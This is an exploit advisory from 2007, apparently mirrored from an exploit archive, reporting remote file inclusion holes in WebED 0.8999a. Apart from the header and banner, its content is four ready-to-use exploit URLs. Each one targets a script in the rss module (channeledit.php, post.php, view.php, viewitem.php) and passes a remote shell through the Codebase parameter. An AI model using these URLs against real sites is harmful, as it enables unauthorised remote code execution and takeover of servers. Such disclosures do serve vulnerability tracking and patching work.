WebED 0.8999a Multiple Remote File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WebED 0.8999a Multiple Remote File Inclusion Vulnerabilities
# Published : 2007-09-08
# Author : MhZ91
# Previous Title : phpress 0.2.0 (adisplay.php lang) Local File Inclusion Vulnerability
# Next Title : Webace-Linkscript 1.3 SE (start.php) Remote SQL Injection Vulnerability

---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |_______    _____/  |_          /_   |/  |_
 |   |/        |  | _(__  <_/ ___   __  ______  |      __
 |   |   |     |  |/         ___|  |   /_____/  |   ||  | 
 |___|___|  /__|  /______  /___  >__|            |___||__| 
          /______|      /     /                          
---------------------------------------------------------------
Http://www.inj3ct-it.org     Staff[at]inj3ct-it[dot]org 
---------------------------------------------------------------
 Multiple Remote File Inclusion Vulnerability
---------------------------------------------------------------
# Author: MhZ91 nobody.91@hotmail.it
# Download Script: http://sourceforge.net/projects/ed-engine/ WebED-0.8999.tar.gz
# Exploit:
# http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/post.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/view.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell]
---------------------------------------------------------------

# www.Syue.com [2007-09-08]